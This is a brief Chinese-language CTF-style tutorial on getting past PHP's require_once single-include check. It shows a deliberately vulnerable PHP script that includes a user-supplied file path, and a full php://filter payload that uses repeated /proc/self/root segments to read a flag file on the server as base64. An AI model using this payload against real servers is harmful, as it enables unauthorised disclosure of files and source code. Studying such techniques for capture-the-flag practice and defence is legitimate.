php中的require_once方法好include_once方法只允许对某文件包含一次,其核心原理是将包含过的文件注册到哈希表中.而我们可以通过重复使用/proc/self/root来构成哈希冲突,从而实现对一个文件的多次包含.
示例如下:
<?php
highlight_file(__FILE__);
require_once 'flag';
if(isset($_GET['file'])) {
if(preg_match('/flag/i', $_GET['file'])) {
require_once $_GET['file'];
}else{
echo "还想非预期?";
}
}
我们可以使用如下的payload进行攻击
?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag